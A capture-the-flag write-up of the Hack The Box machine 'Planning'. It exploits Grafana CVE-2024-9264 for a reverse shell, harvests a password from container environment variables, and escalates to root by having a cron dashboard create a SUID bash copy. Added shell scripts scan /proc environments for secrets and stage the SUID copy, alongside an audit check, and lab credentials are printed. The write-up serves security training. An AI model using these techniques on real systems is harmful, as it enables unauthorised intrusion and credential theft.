Planning HTB

The Nmap scan identifies open ports for OpenSSH and nginx, leading to the discovery of a Grafana subdomain. Exploiting a known vulnerability in Grafana (CVE-2024-9264) gives a shell in the Grafana container, where an environment variable reveals the password of the user 'enzo', enabling SSH access to the host. The user then escalates privileges to root through a cron-job dashboard: a new job copies the bash binary and sets the SUID bit on the copy, which yields a root shell.


Nmap output

The scan reveals:

Port 22: OpenSSH 9.6p1

Port 80: nginx 1.24.0

The web server redirects to http://planning.htb, so I add this domain to my /etc/hosts file.

Subdomain Enumeration
Further enumeration with ffuf (fuzzing the Host header for virtual hosts) uncovers the subdomain grafana.planning.htb. After adding this subdomain to /etc/hosts as well, I log in to the Grafana instance with the credentials provided in the scenario.
Subdomain discovery with ffuf

admin / 0D5oT70Fq13EvB5r

Grafana Exploitation
Checking the Grafana version reveals that it is running 11.0.0, which is affected by CVE-2024-9264: the experimental SQL Expressions feature passes user-supplied SQL to DuckDB without sanitization, giving an authenticated user arbitrary file read and remote code execution. The flaw is only exploitable when the duckdb binary is present on the Grafana server's PATH, which is the case on this box. A public proof-of-concept for this CVE is available on GitHub.
CVE-2024-9264

Exploit on GitHub

First, I create a basic reverse shell script and serve it with Python's built-in HTTP server. Before running the exploit from GitHub, I start a netcat listener on the port specified in the reverse shell, 1337.
rev.sh

HTTP server with Python


Exploit the vulnerability using the GitHub code

Listening on the specified port with netcat

Now I have a shell inside the Grafana Docker container. Inside the container, env reveals the password of the user "enzo" in an environment variable.
enzo user password
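As an added example (not from the original writeup), the check behind that step in script form: a filter for credential-looking variable names, applied to the current shell's environment and to every /proc/<pid>/environ the current user can read, which also catches secrets handed to a sibling process rather than to the shell you landed in. The variable names and values in the block are constructed sample data; the real variable and password from the box are not reproduced.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: where to look for leaked
# credentials after landing in a container, the step that produced enzo's
# password here. Names and values below are constructed sample data.

# Variable names that deserve a look, matched case-insensitively.
SECRET_PATTERN='(pass|pwd|secret|token|key|cred)'

# Keep only KEY=VALUE lines whose KEY matches SECRET_PATTERN.
filter_secret_vars() {
    grep -E -i "^[^=]*${SECRET_PATTERN}[^=]*="
}

# What `env` shows in the shell you landed in, filtered.
scan_own_env() {
    env | filter_secret_vars
}

# Other processes in the same container: /proc/<pid>/environ is the
# NUL-separated environment each process started with, readable for your
# own processes (all of them if you are root). Output is prefixed with the pid.
scan_proc_env() {
    local envfile pid
    for envfile in /proc/[0-9]*/environ; do
        [ -r "$envfile" ] || continue
        pid=${envfile#/proc/}
        pid=${pid%/environ}
        tr '\0' '\n' < "$envfile" | filter_secret_vars | sed "s/^/pid ${pid}: /"
    done
}

# Constructed sample of an `env` dump. The real variable that held enzo's
# password is deliberately not reproduced here.
SAMPLE_ENV='HOME=/usr/share/grafana
GF_SECURITY_ADMIN_PASSWORD=constructed-admin-value
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
SOME_SERVICE_API_TOKEN=constructed-token-value
TERM=xterm'

# Run the filter over the constructed sample; prints the two matching lines.
demo() {
    printf '%s\n' "$SAMPLE_ENV" | filter_secret_vars
}

demo
# On a real target, call scan_own_env and scan_proc_env instead of demo.
```

The name pattern is deliberately broad; false positives such as SSH_AUTH_SOCK or XDG_SESSION_* are cheap to ignore, while a narrow pattern misses the one variable that matters. scan_proc_env is only as good as your read access: inside the container it shows at most the processes running as the same user as the shell.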

I use that password to connect over SSH to the host as enzo; the same password is valid for the host account. After gaining SSH access, I find user.txt in /home/enzo.

ssh with enzo user

Privilege Escalation to the Root User


After gaining access as enzo, I look for a way to escalate privileges to root. First, I check the scheduled tasks stored in the crontab.db file. Inside that file, I find the root password for the cron-job dashboard. I then discover that the dashboard is listening only on localhost, on port 8000.

crontab.db file
Local ports

So I set up SSH local port forwarding to port 8000. After that, I browse to http://127.0.0.1:8000 and log in to the cron-job dashboard with the password found in crontab.db above.

ssh local port forwarding

Login with the credentials: root / P4ssw0rdS0pRi0T3c


Cronjobs dashboard

Now I am on the last step, which is to create a new cron job to escalate to root. The dashboard runs its jobs as root, so I create a job that copies the /bin/bash binary into /tmp and then sets the SUID bit on the copy.
New cronjob
Finally, I go to /tmp and list the files. I see the bash copy there, owned by root with the SUID bit set. I run it with -p (without that flag bash drops the elevated effective UID when it differs from the real one) and get a root shell. Boom!

Root shell
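An added example (not part of the original writeup) showing both sides of this last step. stage_suid_bash does what the cron job is described as doing, copy bash and set the SUID bit, with the target directory as a parameter; the exact command line the author entered in the dashboard is not shown on the page, so the cp/chmod pair is an assumption that matches the text. audit_suid is the check a defender or auditor would run afterwards to find such copies outside the normal system bin directories. Run as an unprivileged user, the staged copy is owned by that user and grants nothing; on the box the job ran as root, which is what turned the copy into a root shell.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: both sides of the SUID-bash
# step. stage_suid_bash does what the dashboard cron job is described as
# doing (copy bash, set the SUID bit); audit_suid finds such copies. The
# exact command line entered in the dashboard is not on the page, so the
# cp/chmod pair below is an assumption that matches the description.

# Copy the system bash into DIR and set the SUID bit on the copy. Run by
# root (as the cron job was), the copy is root-owned and SUID root.
stage_suid_bash() {
    local dir=$1
    cp "$(command -v bash)" "$dir/bash" && chmod u+s "$dir/bash"
}

# Owner of a file, via ls so the check does not depend on GNU stat.
owner_of() {
    ls -ld "$1" | awk '{print $3}'
}

# List SUID files under the given paths, flagging any outside the directories
# where distribution-installed SUID binaries normally live. The exclusion
# list is a heuristic for this demonstration, not an authoritative allow-list.
audit_suid() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r f; do
        case "$f" in
            /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/lib64/*|/usr/libexec/*) ;;
            *) printf 'SUSPICIOUS %s owner=%s\n' "$f" "$(owner_of "$f")" ;;
        esac
    done
}

# Stand-alone demo in a scratch directory: stage a copy, audit it, clean up.
# As an unprivileged user the copy is owned by you and grants nothing.
demo() {
    local dir
    dir=$(mktemp -d) || return 1
    stage_suid_bash "$dir"
    audit_suid "$dir"
    rm -rf "$dir"
}

demo
```

On the box the final command is /tmp/bash -p; without -p bash resets its effective UID to the real UID when the two differ and the SUID bit buys nothing. For a real audit, replace the directory heuristic in audit_suid with a comparison against a package-manager or baseline inventory of expected SUID files, and run it against / rather than a single directory.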
